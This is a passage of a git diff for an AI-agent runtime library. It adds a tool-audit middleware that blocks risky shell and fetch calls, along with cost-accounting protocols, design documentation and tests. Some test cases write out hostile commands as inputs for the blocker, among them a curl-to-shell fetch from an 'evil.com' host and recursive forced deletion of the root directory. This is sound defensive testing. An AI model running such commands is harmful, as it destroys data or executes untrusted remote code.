- All calls: structured audit log entry + + Vetoes a call via ``ctx.block(reason)``; ``NodeContext.call_tool`` + checks ``ctx.is_blocked`` after the chain and returns the reason to the + model instead of executing the tool. + """ + + def __init__( + self, + block_high_risk_bash: bool = True, + audit_log_enabled: bool = True, + bash_classifier: BashClassifier | None = None, + ) -> None: + self._block_bash = block_high_risk_bash + self._audit_enabled = audit_log_enabled + # Shell safety is host-specific: filesystem allowlists, sandboxing and + # command parsing belong to the host. The built-in classifier remains a + # conservative defense-in-depth fallback, not a security boundary. + self._bash_classifier = bash_classifier + + async def before_tool_call( + self, ctx: ToolCallContext, + ) -> ToolCallContext: + """Classify risk and optionally block.""" + risk, reason = self._classify(ctx.tool_name, ctx.tool_args) + ctx.metadata["audit_risk"] = risk + ctx.metadata["audit_reason"] = reason + + if risk == "block" and self._block_bash: + ctx.block(reason) + logger.warning( + "ToolAudit BLOCKED [%s] %s(%s): %s", + ctx.role_id, ctx.tool_name, + _truncate_args(ctx.tool_args), reason, + ) + elif risk == "warn": + logger.warning( + "ToolAudit WARN [%s] %s(%s): %s", + ctx.role_id, ctx.tool_name, + _truncate_args(ctx.tool_args), reason, + ) + + if self._audit_enabled: + self._audit_log(ctx, risk, reason) + + return ctx + + async def after_tool_call( + self, ctx: ToolCallContext, result: str, + ) -> str: + """Log tool result summary for audit trail.""" + if self._audit_enabled: + risk = ctx.metadata.get("audit_risk", "pass") + if risk != "pass": + logger.info( + "ToolAudit result [%s] %s: %s (risk=%s)", + ctx.role_id, ctx.tool_name, + result[:100], risk, + ) + return result + + def _classify( + self, tool_name: str, tool_args: dict[str, Any], + ) -> tuple[RiskLevel, str]: + """Classify tool call risk level.""" + if tool_name == "bash": + return self._classify_bash( + str(tool_args.get("command", "")) + ) + if tool_name == "web_fetch": + return self._classify_scrape( + str(tool_args.get("url", "")) + ) + return "pass", "" + + def _classify_bash(self, command: str) -> tuple[RiskLevel, str]: + """Classify bash command risk.""" + cmd_lower = command.lower().strip() + + if self._bash_classifier is not None: + return self._bash_classifier(command) + + # Match recursive+force deletion even when flags are split, reordered, + # or written in long form. The old ``rm -rf`` literal check let obvious + # equivalents such as ``rm -r -f --no-preserve-root /`` pass. + if re.search(r"\brm\b", cmd_lower): + has_recursive = bool( + re.search(r"(?:^|\s)--recursive(?:\s|=|$)", cmd_lower) + or re.search(r"(?:^|\s)-[a-z]*r[a-z]*(?:\s|$)", cmd_lower) + ) + has_force = bool( + re.search(r"(?:^|\s)--force(?:\s|=|$)", cmd_lower) + or re.search(r"(?:^|\s)-[a-z]*f[a-z]*(?:\s|$)", cmd_lower) + ) + if has_recursive and has_force: + return "block", "high-risk bash: rm recursive+force" + + for pattern, reason in _BASH_BLOCK_PATTERNS: + if pattern.search(cmd_lower): + return "block", f"high-risk bash: {reason}" + + for pattern, reason in _BASH_WARN_PATTERNS: + if pattern.search(cmd_lower): + return "warn", f"elevated-risk bash: {reason}" + + return "pass", "" + + def _classify_scrape(self, url: str) -> tuple[RiskLevel, str]: + """Classify web_fetch URL risk.""" + url_lower = url.lower() + + # Internal/localhost targets + if any( + h in url_lower + for h in ("localhost", "127.0.0.1", "0.0.0.0", "169.254.") + ): + return "warn", f"scrape targets internal address: {url[:80]}" + + # Non-HTTP schemes + if url_lower and not url_lower.startswith(("http://", "https://")): + return "warn", f"non-HTTP scrape scheme: {url[:80]}" + + return "pass", "" + + def _audit_log( + self, + ctx: ToolCallContext, + risk: RiskLevel, + reason: str, + ) -> None: + """Emit structured audit log entry.""" + logger.debug( + "ToolAudit: task=%s role=%s tool=%s risk=%s reason=%s " + "args=%s", + ctx.task_id, ctx.role_id, ctx.tool_name, + risk, reason or "none", + _truncate_args(ctx.tool_args), + ) + + +def _truncate_args(args: dict[str, Any], max_len: int = 100) -> str: + """Truncate tool args for logging.""" + s = str(args) + return s[:max_len] + "..." if len(s) > max_len else s + + +__all__ = ["BashClassifier", "RiskLevel", "ToolAuditMiddleware"] diff --git a/agent_core/protocols.py b/agent_core/protocols.py index 56bed3f..ea6e15b 100644 --- a/agent_core/protocols.py +++ b/agent_core/protocols.py @@ -212,9 +212,59 @@ def toggle_skill(self, skill_id: str, enabled: bool) -> bool: ... def reload(self) -> None: ... +@runtime_checkable +class CostSink(Protocol): + """Per-task cost accounting in USD. + + Deliberately synchronous: ``record`` is called from middleware on the LLM + hot path, and an await there would put an event-loop hop between a + provider response and the accounting that must not be able to lose it. + Returns the incremental cost so a caller can log or emit it without a + second lookup. + """ + + def record( + self, + task_id: str, + model_name: str, + input_tokens: int, + output_tokens: int, + ) -> float: ... + + def get_summary(self, task_id: str) -> Mapping[str, Any]: + """Return the final per-task summary forwarded to ``CostPersister``.""" + ... + + +@runtime_checkable +class CostPersister(Protocol): + """Durable sink for a task's final cost summary. + + Separate from :class:`CostSink` because the two have different lifetimes + and different failure tolerances: ``CostSink.record`` runs per LLM call and + may live purely in memory, while ``persist`` runs once at completion and is + the only path that reaches a database. Keeping it behind a Protocol is what + lets the token-accounting middleware live here at all -- the schema, the + column names and the session handling are all host concerns. + + ``summary`` is whatever the host's ``CostSink`` returns from its own + ``get_summary``; AgentCore forwards it without inspecting it beyond passing + it through, so a host is free to evolve that shape without a core release. + """ + + async def persist( + self, + task_id: str, + summary: Mapping[str, Any], + model: str, + ) -> None: ... + + __all__ = [ "BLOCKED_KEY", "BLOCK_REASON_KEY", + "CostPersister", + "CostSink", "EventReader", "EventSink", "ExecutionMiddleware", diff --git a/docs/middleware-boundary.md b/docs/middleware-boundary.md new file mode 100644 index 0000000..a85f0fb --- /dev/null +++ b/docs/middleware-boundary.md @@ -0,0 +1,96 @@ +# Middleware boundary + +AgentCore owns two composable interception layers and the portable middlewares +that sit in them. + +**Phase/tool middleware** — `agent_core.components.middleware.base.MiddlewareChain` +runs the `ExecutionMiddleware` contract declared in `agent_core.protocols` +(before/after phase, before/after tool, on_error). After-hooks run in reverse +registration order, so a chain nests rather than merely sequences: the first +middleware registered is the outermost layer. Hosts resolve the chain through the +structural `PhaseMiddlewareChain` protocol. + +**LLM middleware** — `agent_core.components.middleware.llm.base.LLMMiddlewareChain` +wraps an `LLMClient` through `LLMProxy`. Same nesting rule. + +Portable middlewares shipped here: + +| Module | What it does | +|---|---| +| `llm.retry` | Exponential back-off with jitter for transient failures, clamped by `backoff_max`. Returns `True` from `on_llm_error` so the proxy re-issues. | +| `llm.tracing` | Duration, message counts and usage per call into an injected trace sink. Surfaces a fallback chain's `fallback_used` / `model_actually_used` markers. | +| `llm.token_accounting` | Per-task token totals, cost recording, SSE emission, budget charging. | +| `llm.loop_detection` | Fingerprints recent tool calls and injects a strategy-switch hint on repeats, with state isolated by task/session, role and phase. | +| `llm.output_repair` | Rewrites malformed reasoning markup, preserving every other `LLMResponse` field. | +| `llm.compaction` | Caller-invoked rolling-summary helper for a history that outgrew its budget. | +| `llm.api_key_rotation` | Mid-stream key rotation. Scaffolded and deliberately inert: `_rotate_client_credentials` raises `NotImplementedError`. | +| `rate_limit` | Concurrent-safe token-bucket RPM/TPM limiter that estimates before the call and corrects from actual usage after. | +| `tool_audit` | Pattern-based defense-in-depth classification of `bash` / `web_fetch` arguments; can veto a call and accepts a host-owned bash classifier. | +| `status_report` | Sub-agent phase heartbeat to a parent over the agent bus; host result fields come from an optional summarizer callback. | +| `todo` | Injects compact task progress through the active working memory's polymorphic `one_line_summary()`. | + +## What the product owns + +**The composition root.** Nothing here decides which middlewares run, in what +order, or with what parameters. A host builds its chains and registers them. +AgentCore ships no default chain, because ordering is a product decision with +observable consequences — `output_repair` last means it is innermost in the +reverse-order after-pass, which is what lets it see the response every other +layer already annotated. + +**Durable cost persistence.** `TokenAccountingMiddleware` takes two Protocols +from `agent_core.protocols`, and the split between them is the boundary: + +- `CostSink.record` runs per LLM call, synchronously, on the hot path. Its + `get_summary(task_id)` supplies the final mapping when persistence is enabled; + it may still live entirely in memory. +- `CostPersister.persist` runs once at completion and is the only path that + reaches a database. The schema, the column names and the transaction boundary + are host concerns; `summary` is forwarded from the host's own `get_summary` + without core inspecting its shape, so a host can evolve it without a core + release. + +Both default to `None`, which makes `persist_cost` a no-op — the right behavior +for a stateless SDK path, not an error. Supplying a persister with a sink that +does not satisfy the full `CostSink` contract fails at construction time rather +than silently dropping final persistence. A raising persister is swallowed at +debug level: accounting is observability, and a database that is down must not +fail the task whose cost it describes. + +**Trace and event sinks.** `llm.tracing` takes its sink duck-typed; a host that +registers nothing gets a no-op rather than an error. + +**Phase-level infra middlewares that need host services.** Anything that +resolves a task-context store, an event store or a process manager stays in the +product. That is why the product's own `builtins` module is not here: it reaches +for a `TaskContextStore` through the registry and hardcodes a domain vocabulary +when summarising a phase result. + +The same rule applies to result and progress vocabularies. Core's status reporter +accepts a host-owned `result_summarizer`, and Todo calls the working-memory +object's `one_line_summary()` method. A research host may report evidence and +assertions through those seams without AgentCore naming either field. + +**Shell enforcement.** The built-in ToolAudit patterns catch common catastrophic +forms and now normalize recursive/force `rm` flags, but regexes cannot interpret +the full shell language or know a host's writable roots. Treat them as +defense-in-depth. Hosts that expose a shell should inject their authoritative +classifier and enforce sandbox/filesystem policy at the tool boundary as well. + +## Compaction prompts + +`llm.compaction` uses `agent_core.runtime.loop.summary_prompt`, which offers +`RESEARCH_COMPACTION_PROMPT`, `HANDOFF_COMPACTION_PROMPT` and a +`compaction_prompt()` selector. A host with a tool-category callback gets +conversation-aware selection; a host with neither gets the research prompt, which +is what `COMPACTION_PROMPT` aliases. Products should not carry private forks of +this prompt — a fork silently stops receiving improvements while still looking +like the shared one. + +## Known rough edge, carried across unchanged + +`TokenAccountingMiddleware._record_usage_aggregator` calls `record_llm_call` +through a three-level cascading `TypeError` fallback across three different kwarg +signatures. It is tolerant of aggregator builds that predate `provider` / `scene` +/ `cache_write_tokens`. Collapsing it is a behavior change and needs its own +review; it is documented here so nobody mistakes it for an accident. diff --git a/pyproject.toml b/pyproject.toml index 8c7c273..b261d40 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [project] name = "apodex-agent-core" -version = "0.5.0" +version = "0.6.0" description = "Shared, product-neutral runtime primitives for Apodex agents" readme = "README.md" license = "Apache-2.0" diff --git a/tests/test_api_key_rotation_shared.py b/tests/test_api_key_rotation_shared.py new file mode 100644 index 0000000..781d648 --- /dev/null +++ b/tests/test_api_key_rotation_shared.py @@ -0,0 +1,181 @@ +"""``APIKeyRotationMiddleware`` — placeholder, structural tests only. + +The provider-specific credential swap (``_rotate_client_credentials``) +is a stub that the operator fills in before production use. These tests +lock the surrounding structure so the operator's edit can land without +worrying that the rotation cursor or retriable classifier silently +regressed. + +What we DO test: +- enabled-property gates on key-count +- on_llm_error rotates the cursor when the error is retriable +- non-retriable errors don't rotate +- exhausted keys yield to the outer fallback +- max_total_rotations cap fires +- placeholder _rotate_client_credentials raises NotImplementedError +- per-call_index state isolation + +What we do NOT test: +- actual mid-stream HTTP retry (needs a live 529-on-demand target) +- provider-client mutation (placeholder; operator fills in) +""" + +from __future__ import annotations + +import pytest + +from agent_core.components.middleware.llm.api_key_rotation import ( + APIKeyRotationMiddleware, +) +from agent_core.components.middleware.llm.base import LLMCallContext + + +class _MockRotation(APIKeyRotationMiddleware): + """Subclass that stubs the placeholder so we can test the framing.""" + + def __init__(self, *, api_keys, **kw) -> None: + super().__init__(api_keys=api_keys, **kw) + self.rotated_to: list[str] = [] + self.rotate_should_raise: Exception | None = None + + def _rotate_client_credentials(self, new_api_key: str) -> None: + if self.rotate_should_raise is not None: + raise self.rotate_should_raise + self.rotated_to.append(new_api_key) + + +# ── Constructor + enabled gating ──────────────────────────────────── + + +def test_constructor_rejects_empty_key_list() -> None: + """Locks the contract: at least one key required. An empty list + would silently disable rotation while looking configured.""" + with pytest.raises(ValueError): + APIKeyRotationMiddleware(api_keys=[]) + + +def test_single_key_disables_middleware() -> None: + """One key = nothing to rotate to. The middleware short-circuits + via ``enabled = False`` so the proxy skips it without per-call + overhead. Common case: a profile with no fallback keys configured.""" + mw = APIKeyRotationMiddleware(api_keys=["only-key"]) + assert mw.enabled is False + + +def test_multiple_keys_enables_middleware() -> None: + mw = APIKeyRotationMiddleware(api_keys=["a", "b", "c"]) + assert mw.enabled is True + + +# ── Rotation behaviour ───────────────────────────────────────────── + + +@pytest.mark.asyncio +async def test_retriable_error_rotates_to_next_key() -> None: + """Retriable error → cursor advances + rotation callback fires → + middleware asks proxy to retry.""" + mw = _MockRotation(api_keys=["k0", "k1", "k2"]) + ctx = LLMCallContext(call_index=0) + retry = await mw.on_llm_error(ctx, TimeoutError("upstream 529"), attempt=0) + assert retry is True + assert mw.rotated_to == ["k1"] + assert ctx.metadata["api_key_rotation_idx"] == 1 + + +@pytest.mark.asyncio +async def test_non_retriable_error_does_not_rotate() -> None: + """ValueError isn't in the retriable keyword set → middleware + yields immediately. Lets structural bugs propagate fast instead + of wasting keys.""" + mw = _MockRotation(api_keys=["k0", "k1", "k2"]) + ctx = LLMCallContext(call_index=0) + retry = await mw.on_llm_error(ctx, ValueError("bad request"), attempt=0) + assert retry is False + assert mw.rotated_to == [] + + +@pytest.mark.asyncio +async def test_exhausted_keys_yields_to_outer_fallback() -> None: + """After the last key fails, return False so V3 cross-provider + fallback (in heavy_reporter._run_with_fallback_keys) can fire.""" + mw = _MockRotation(api_keys=["k0", "k1"]) + ctx = LLMCallContext(call_index=0) + + # First failure rotates to k1. + assert await mw.on_llm_error(ctx, TimeoutError("529"), 0) is True + # Second failure: nothing left, yield. + assert await mw.on_llm_error(ctx, TimeoutError("529"), 1) is False + assert mw.rotated_to == ["k1"] + + +@pytest.mark.asyncio +async def test_max_total_rotations_caps_runaway_loops() -> None: + """Across many concurrent calls, the middleware refuses to rotate + forever if the underlying error pattern isn't actually auth-related. + Prevents burning through quota chasing a structural bug.""" + mw = _MockRotation(api_keys=["k0", "k1", "k2", "k3", "k4"], max_total_rotations=2) + err = TimeoutError("rate limit") + + # Two rotations across two distinct calls — both succeed. + ctx_a = LLMCallContext(call_index=0) + assert await mw.on_llm_error(ctx_a, err, 0) is True + ctx_b = LLMCallContext(call_index=1) + assert await mw.on_llm_error(ctx_b, err, 0) is True + + # Third rotation hits the cap; middleware yields. + ctx_c = LLMCallContext(call_index=2) + assert await mw.on_llm_error(ctx_c, err, 0) is False + assert len(mw.rotated_to) == 2 # capped + + +@pytest.mark.asyncio +async def test_rotation_callback_raising_aborts_rotation_attempt() -> None: + """If the operator's ``_rotate_client_credentials`` blows up, the + middleware must NOT ask the proxy to retry into a half-mutated + client. Yield to outer fallback instead.""" + mw = _MockRotation(api_keys=["k0", "k1"]) + mw.rotate_should_raise = RuntimeError("provider client broke") + ctx = LLMCallContext(call_index=0) + retry = await mw.on_llm_error(ctx, TimeoutError("529"), 0) + assert retry is False + + +@pytest.mark.asyncio +async def test_state_is_per_call_index() -> None: + """Concurrent streams must each start from key #1 — one call's + cursor advancement must not leak to another's.""" + mw = _MockRotation(api_keys=["k0", "k1", "k2"]) + metadata: dict = {} + ctx_a = LLMCallContext(call_index=0, metadata=metadata) + ctx_b = LLMCallContext(call_index=1, metadata=metadata) + + await mw.on_llm_error(ctx_a, TimeoutError("529"), 0) + await mw.on_llm_error(ctx_b, TimeoutError("529"), 0) + + # Both rotated to k1 — they don't share a cursor. + assert mw.rotated_to == ["k1", "k1"] + + +# ── Placeholder enforcement ───────────────────────────────────────── + + +def test_default_rotate_implementation_raises_NotImplementedError() -> None: + """The base class refuses to silently no-op. An operator wiring + this middleware in production must override the method; forgetting + is a loud failure, not a stealth one.""" + mw = APIKeyRotationMiddleware(api_keys=["k0", "k1"]) + with pytest.raises(NotImplementedError): + mw._rotate_client_credentials("k1") + + +@pytest.mark.asyncio +async def test_unstubbed_on_llm_error_swallows_NotImplementedError_and_yields() -> None: + """An operator who forgets to override the method shouldn't crash + the LLM call — the middleware should log + yield to outer fallback. + Production safety net for the partial-implementation state.""" + mw = APIKeyRotationMiddleware(api_keys=["k0", "k1"]) + ctx = LLMCallContext(call_index=0) + # _rotate_client_credentials raises NotImplementedError; on_llm_error + # catches the placeholder exception and yields. + retry = await mw.on_llm_error(ctx, TimeoutError("529"), 0) + assert retry is False diff --git a/tests/test_middleware_isolation_shared.py b/tests/test_middleware_isolation_shared.py new file mode 100644 index 0000000..19540b5 --- /dev/null +++ b/tests/test_middleware_isolation_shared.py @@ -0,0 +1,146 @@ +"""Regression coverage for shared middleware state and host-owned summaries.""" + +from __future__ import annotations + +from typing import Any + +import pytest + +from agent_core.components.memory import WorkingMemory, current_working_memory +from agent_core.components.middleware.llm.base import LLMCallContext +from agent_core.components.middleware.llm.loop_detection import LoopDetectionMiddleware +from agent_core.components.middleware.status_report import StatusReportMiddleware +from agent_core.components.middleware.todo import TodoMiddleware +from agent_core.llm import LLMResponse +from agent_core.messages import text_of, user_msg +from agent_core.protocols import PhaseContext +from agent_core.runtime.registries import services + + +def _tool_response() -> LLMResponse: + return LLMResponse( + content="", + tool_calls=[ + { + "function": { + "name": "web_search", + "arguments": '{"q":"same"}', + } + } + ], + ) + + +@pytest.mark.asyncio +async def test_loop_detection_does_not_mix_tasks() -> None: + middleware = LoopDetectionMiddleware(trigger_count=3) + response = _tool_response() + + for task_id in ("task-a", "task-b", "task-c"): + await middleware.after_llm(LLMCallContext(task_id=task_id), response) + + messages = [user_msg("continue")] + result = await middleware.before_llm(LLMCallContext(task_id="task-d"), messages) + + assert result == messages + + +@pytest.mark.asyncio +async def test_loop_detection_still_triggers_within_one_scope() -> None: + middleware = LoopDetectionMiddleware(trigger_count=3) + ctx = LLMCallContext(task_id="task-a", role_id="solver", phase_id="solve") + + for _ in range(3): + await middleware.after_llm(ctx, _tool_response()) + + result = await middleware.before_llm(ctx, [user_msg("continue")]) + + assert result[0]["role"] == "system" + assert "loop detected" in text_of(result[0].get("content")).lower() + + +@pytest.mark.asyncio +async def test_anonymous_calls_do_not_share_loop_history() -> None: + middleware = LoopDetectionMiddleware(trigger_count=2) + for _ in range(2): + await middleware.after_llm(LLMCallContext(), _tool_response()) + + messages = [user_msg("continue")] + assert await middleware.before_llm(LLMCallContext(), messages) == messages + + +@pytest.mark.asyncio +async def test_todo_uses_polymorphic_working_memory_summary() -> None: + class ArtifactMemory(WorkingMemory): + def one_line_summary(self) -> str: + return "7 artifacts ready" + + memory = ArtifactMemory(task_id="task-a") + token = current_working_memory.set(memory) + try: + result = await TodoMiddleware().before_llm( + LLMCallContext(task_id="task-a", metadata={"turn": 3}), + [user_msg("continue")], + ) + finally: + current_working_memory.reset(token) + + assert "7 artifacts ready" in "\n".join(text_of(msg.get("content")) for msg in result) + + +class _RecordingComm: + def __init__(self) -> None: + self.messages: list[Any] = [] + + async def send(self, message: Any, *, mode: Any) -> None: + self.messages.append(message) + + +@pytest.mark.asyncio +async def test_status_report_has_no_research_schema_by_default( + monkeypatch: pytest.MonkeyPatch, +) -> None: + comm = _RecordingComm() + monkeypatch.setattr(services, "get_optional", lambda service_type: comm) + middleware = StatusReportMiddleware() + ctx = PhaseContext( + task_id="task-a", + phase_id="solve", + role_id="worker", + metadata={"parent_agent_id": "parent"}, + ) + + await middleware.after_phase( + ctx, + {"evidence_cards": [1, 2], "assertions": [1]}, + ) + + content = comm.messages[0].content + assert "evidence_count" not in content + assert "assertion_count" not in content + + +@pytest.mark.asyncio +async def test_status_report_accepts_host_owned_result_summary( + monkeypatch: pytest.MonkeyPatch, +) -> None: + comm = _RecordingComm() + monkeypatch.setattr(services, "get_optional", lambda service_type: comm) + middleware = StatusReportMiddleware( + result_summarizer=lambda result: { + "artifact_count": len(result.get("artifacts", [])), + "status": "spoofed", + } + ) + ctx = PhaseContext( + task_id="task-a", + phase_id="solve", + role_id="worker", + metadata={"parent_agent_id": "parent"}, + ) + + await middleware.after_phase(ctx, {"artifacts": [1, 2, 3]}) + + content = comm.messages[0].content + assert content["artifact_count"] == 3 + assert content["status"] == "phase_completed" diff --git a/tests/test_middleware_runtime_safety_shared.py b/tests/test_middleware_runtime_safety_shared.py new file mode 100644 index 0000000..a5d90cc --- /dev/null +++ b/tests/test_middleware_runtime_safety_shared.py @@ -0,0 +1,336 @@ +"""Tests for Phase C runtime safety middlewares (Issue #24). + +Covers: RateLimitMiddleware, ToolAuditMiddleware, block mechanism. +""" + +from __future__ import annotations + +import asyncio + +import pytest + +import agent_core.components.middleware.rate_limit as rate_limit_module +from agent_core.components.middleware.llm.base import LLMCallContext +from agent_core.components.middleware.rate_limit import ( + RateLimitMiddleware, + TokenBucket, +) +from agent_core.components.middleware.tool_audit import ToolAuditMiddleware +from agent_core.llm import LLMResponse +from agent_core.messages import user_msg +from agent_core.protocols import ToolCallContext + +# ── TokenBucket ───────────────────────────────────────────────────────── + + +@pytest.mark.asyncio +async def test_token_bucket_no_wait_when_capacity(): + """Should not wait when bucket has capacity.""" + bucket = TokenBucket(requests_per_min=60, tokens_per_min=100_000) + wait = await bucket.acquire(estimated_tokens=100) + assert wait == 0.0 + + +@pytest.mark.asyncio +async def test_token_bucket_queues_when_exhausted(): + """Should wait when request bucket is exhausted.""" + bucket = TokenBucket(requests_per_min=2, tokens_per_min=100_000) + + # Exhaust request bucket + await bucket.acquire() + await bucket.acquire() + + # Third should wait — but we just check it doesn't error + # (actual wait would be ~30s, so we test with a tiny bucket) + bucket2 = TokenBucket(requests_per_min=1000, tokens_per_min=100_000) + # Exhaust and immediately refill due to high rpm + for _ in range(10): + await bucket2.acquire() + # Should not hang + + +@pytest.mark.asyncio +async def test_token_bucket_rechecks_capacity_after_concurrent_waits( + monkeypatch: pytest.MonkeyPatch, +) -> None: + """One refill must release only one request when waiters wake together.""" + bucket = TokenBucket(requests_per_min=60, tokens_per_min=100_000) + bucket._request_tokens = 0.0 + + clock = [0.0] + arrivals = [0] + initial_waiters = asyncio.Event() + real_sleep = asyncio.sleep + + monkeypatch.setattr(rate_limit_module.time, "monotonic", lambda: clock[0]) + bucket._last_refill = 0.0 + + async def advance_clock(delay: float) -> None: + arrivals[0] += 1 + if arrivals[0] <= 3: + if arrivals[0] == 3: + clock[0] = delay + initial_waiters.set() + await initial_waiters.wait() + return + clock[0] += delay + await real_sleep(0) + + monkeypatch.setattr(rate_limit_module.asyncio, "sleep", advance_clock) + + waits = await asyncio.gather(*(bucket.acquire() for _ in range(3))) + + assert all(wait >= 1.0 for wait in waits) + assert bucket._request_tokens >= 0.0 + + +@pytest.mark.parametrize( + ("requests_per_min", "tokens_per_min"), + [(0, 100), (-1, 100), (1, 0), (1, -1)], +) +def test_token_bucket_rejects_non_positive_limits( + requests_per_min: int, + tokens_per_min: int, +) -> None: + with pytest.raises(ValueError): + TokenBucket(requests_per_min, tokens_per_min) + + +def test_token_bucket_adjust_overestimate(): + """adjust() should return tokens on overestimate.""" + bucket = TokenBucket(requests_per_min=60, tokens_per_min=10000) + # Manually set state + bucket._token_tokens = 5000.0 + + bucket.adjust(actual_tokens=100, estimated_tokens=500) + # Should have gotten 400 tokens back + assert bucket._token_tokens == 5400.0 + + +def test_token_bucket_adjust_underestimate(): + """adjust() should consume more on underestimate.""" + bucket = TokenBucket(requests_per_min=60, tokens_per_min=10000) + bucket._token_tokens = 5000.0 + + bucket.adjust(actual_tokens=500, estimated_tokens=100) + # Should have consumed 400 more + assert bucket._token_tokens == 4600.0 + + +# ── RateLimitMiddleware ───────────────────────────────────────────────── + + +@pytest.mark.asyncio +async def test_rate_limit_middleware_name(): + mw = RateLimitMiddleware() + assert mw.name == "rate_limit" + + +@pytest.mark.asyncio +async def test_rate_limit_before_llm_estimates_tokens(): + """before_llm should estimate token count and store in metadata.""" + mw = RateLimitMiddleware(requests_per_min=1000, tokens_per_min=1_000_000) + ctx = LLMCallContext(task_id="t", role_id="r") + messages = [user_msg("Hello world")] + + result = await mw.before_llm(ctx, messages) + assert result == messages + assert "_rate_limit_estimated_tokens" in ctx.metadata + + +@pytest.mark.asyncio +async def test_rate_limit_after_llm_adjusts_bucket(): + """after_llm should correct bucket with actual usage.""" + mw = RateLimitMiddleware(requests_per_min=1000, tokens_per_min=1_000_000) + ctx = LLMCallContext(task_id="t", role_id="r") + ctx.metadata["_rate_limit_estimated_tokens"] = 500 + + response = LLMResponse( + content="hi", + response_metadata={"token_usage": {"total_tokens": 100}}, + ) + result = await mw.after_llm(ctx, response) + assert result == response + + +# ── ToolAuditMiddleware ───────────────────────────────────────────────── + + +@pytest.mark.asyncio +async def test_audit_blocks_rm_rf(): + """Should block rm -rf commands.""" + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="bash", tool_args={"command": "rm -rf /tmp/data"}, + ) + result = await mw.before_tool_call(ctx) + assert result.metadata["blocked"] is True + assert result.metadata["audit_risk"] == "block" + assert "high-risk bash" in result.metadata["block_reason"] + + +@pytest.mark.asyncio +@pytest.mark.parametrize( + "command", + [ + "rm -r -f --no-preserve-root /", + "rm --recursive --force --no-preserve-root /", + ], +) +async def test_audit_blocks_equivalent_recursive_force_rm(command: str) -> None: + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", + phase_id="react_solve", + role_id="solver", + tool_name="bash", + tool_args={"command": command}, + ) + + result = await mw.before_tool_call(ctx) + + assert result.is_blocked + assert result.metadata["audit_risk"] == "block" + + +@pytest.mark.asyncio +async def test_audit_uses_host_classifier_when_provided() -> None: + seen: list[str] = [] + + def classify(command: str): + seen.append(command) + return "warn", "host policy" + + mw = ToolAuditMiddleware(bash_classifier=classify) + ctx = ToolCallContext( + task_id="t", + phase_id="phase", + tool_name="bash", + tool_args={"command": "rm -rf /"}, + ) + + result = await mw.before_tool_call(ctx) + + assert seen == ["rm -rf /"] + assert result.metadata == {"audit_risk": "warn", "audit_reason": "host policy"} + + +@pytest.mark.asyncio +async def test_audit_blocks_curl_pipe_sh(): + """Should block curl | sh patterns.""" + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="bash", + tool_args={"command": "curl https://evil.com/install.sh | sh"}, + ) + result = await mw.before_tool_call(ctx) + assert result.metadata["blocked"] is True + assert "curl pipe to shell" in result.metadata["block_reason"] + + +@pytest.mark.asyncio +async def test_audit_warns_sudo(): + """Should warn on sudo usage (not block).""" + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="bash", tool_args={"command": "sudo apt update"}, + ) + result = await mw.before_tool_call(ctx) + assert result.metadata["audit_risk"] == "warn" + assert "blocked" not in result.metadata + + +@pytest.mark.asyncio +async def test_audit_passes_safe_commands(): + """Should pass safe bash commands.""" + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="bash", tool_args={"command": "echo hello && ls -la"}, + ) + result = await mw.before_tool_call(ctx) + assert result.metadata["audit_risk"] == "pass" + assert "blocked" not in result.metadata + + +@pytest.mark.asyncio +async def test_audit_warns_localhost_scrape(): + """Should warn on scraping localhost.""" + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="web_fetch", tool_args={"url": "http://localhost:8080/admin"}, + ) + result = await mw.before_tool_call(ctx) + assert result.metadata["audit_risk"] == "warn" + + +@pytest.mark.asyncio +async def test_audit_passes_normal_scrape(): + """Should pass normal web scraping.""" + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="web_fetch", + tool_args={"url": "https://example.com/article"}, + ) + result = await mw.before_tool_call(ctx) + assert result.metadata["audit_risk"] == "pass" + + +@pytest.mark.asyncio +async def test_audit_passes_non_audited_tools(): + """Non-bash/scrape tools should pass.""" + mw = ToolAuditMiddleware() + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="web_search", tool_args={"query": "test"}, + ) + result = await mw.before_tool_call(ctx) + assert result.metadata["audit_risk"] == "pass" + + +@pytest.mark.asyncio +async def test_audit_block_disabled(): + """When block_high_risk_bash=False, should warn instead of block.""" + mw = ToolAuditMiddleware(block_high_risk_bash=False) + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="bash", tool_args={"command": "rm -rf /"}, + ) + result = await mw.before_tool_call(ctx) + # Risk is still "block" classification, but blocked flag not set + assert result.metadata["audit_risk"] == "block" + assert "blocked" not in result.metadata + + +# ── Block mechanism in orchestrator (via middleware chain) ────────────── + + +@pytest.mark.asyncio +async def test_block_mechanism_prevents_execution(): + """MiddlewareChain + blocked flag should prevent tool execution.""" + from agent_core.components.middleware.base import MiddlewareChain + + chain = MiddlewareChain() + chain.add(ToolAuditMiddleware()) + + ctx = ToolCallContext( + task_id="t", phase_id="react_solve", role_id="solver", + tool_name="bash", + tool_args={"command": "rm -rf /important"}, + ) + + ctx = await chain.run_before_tool_call(ctx) + assert ctx.metadata.get("blocked") is True + + # Orchestrator would check this and skip execution + if ctx.metadata.get("blocked"): + result = f"Error: {ctx.metadata.get('block_reason', 'blocked')}" + else: + result = "should not reach here" + + assert "high-risk bash" in result diff --git a/tests/test_middleware_seams_shared.py b/tests/test_middleware_seams_shared.py new file mode 100644 index 0000000..f8d7097 --- /dev/null +++ b/tests/test_middleware_seams_shared.py @@ -0,0 +1,316 @@ +"""Coverage for the three middleware seams that arrived here untested. + +``LLMRetryMiddleware`` and ``LLMTracingMiddleware`` had no tests in the product +they came from. ``TokenAccountingMiddleware.persist_cost`` had none either, and +it is the one piece whose shape changed on the way in: a SQLAlchemy session +factory plus an inline table write became the injected ``CostPersister`` +Protocol, so the seam needs a test that pins the contract rather than the +former implementation. +""" + +from __future__ import annotations + +import asyncio +from typing import Any + +import pytest 